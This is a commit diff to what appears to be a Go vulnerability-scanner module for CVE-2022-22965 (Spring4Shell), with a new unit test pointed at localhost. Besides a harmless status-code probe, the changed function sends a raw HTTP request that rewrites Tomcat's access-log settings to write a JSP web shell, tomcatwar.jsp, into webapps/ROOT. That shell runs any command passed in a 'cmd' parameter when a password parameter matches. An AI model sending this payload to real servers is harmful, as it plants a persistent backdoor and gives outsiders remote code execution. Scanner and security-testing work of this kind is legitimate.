Spring Framework RCE via Data Binding on JDK 9+ (CVE-2022-22965) 2022-10-13

hktalent · hktalent · commit a254deec81f1 · 2022-10-13T16:23:23.000+08:00
diff --git a/pocs_go/Springboot/CVE-2022-22965.go b/pocs_go/Springboot/CVE-2022-22965.go
@@ -8,17 +8,20 @@ import (
 )
 
 func CVE_2022_22965(u string) bool {
-	if req, err := util.HttpRequset(u+"?class.module.classLoader%5b1%5d=1", "GET", "", false, nil); err == nil {
-		if req.StatusCode == 500 {
-			if req2, err := util.HttpRequset(u+"?class.module.classLoader=1", "GET", "", false, nil); err == nil {
-				if req2.StatusCode == 200 {
-					return true
+	if oU, err := url.Parse(u); nil == err && oU.Host != "" {
+		szUrl := oU.Scheme + "://" + oU.Host
+		if req, err := util.HttpRequset(szUrl+"?class.module.classLoader%5b1%5d=1", "GET", "", false, nil); err == nil {
+			if req.StatusCode == 500 {
+				if req2, err := util.HttpRequset(szUrl+"?class.module.classLoader=1", "GET", "", false, nil); err == nil {
+					if req2.StatusCode == 200 {
+						return true
+					}
 				}
 			}
 		}
-	}
-	if oU, err := url.Parse(u); nil == err && oU.Host != "" {
+
 		cc := socket.NewCheckTarget(u, "tcp", 50)
+		defer cc.Close()
 		cc.SendPayload([]byte(strings.ReplaceAll(`GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1
 Host: `+oU.Host+`
 Accept-Encoding: gzip, deflate
diff --git a/pocs_go/Springboot/CVE-2022-22965_test.go b/pocs_go/Springboot/CVE-2022-22965_test.go
@@ -0,0 +1,23 @@
+package Springboot
+
+import "testing"
+
+func TestCVE_2022_22965(t *testing.T) {
+	type args struct {
+		u string
+	}
+	tests := []struct {
+		name string
+		args args
+		want bool
+	}{
+		{"test CVE_2022_22965", args{"http://127.0.0.1:8080"}, true},
+	}
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			if got := CVE_2022_22965(tt.args.u); got != tt.want {
+				t.Errorf("CVE_2022_22965() = %v, want %v", got, tt.want)
+			}
+		})
+	}
+}
